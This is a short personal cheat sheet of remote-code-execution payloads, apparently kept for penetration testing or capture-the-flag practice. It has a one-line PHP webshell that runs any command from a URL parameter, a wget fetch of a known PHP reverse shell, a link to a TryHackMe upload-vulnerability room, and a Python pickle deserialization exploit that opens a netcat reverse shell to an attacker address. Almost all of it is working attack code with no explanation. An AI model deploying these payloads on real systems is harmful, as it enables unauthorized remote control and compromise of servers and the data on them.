/home/parity0x1/rce

PHP Webshell

<?php echo system($_GET["cmd"]); ?>

PHP Reverse Shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

JS Response Editing & Magic Bytes

https://tryhackme.com/room/uploadvulns

Flask Pickle Deserialization

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <IP> 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))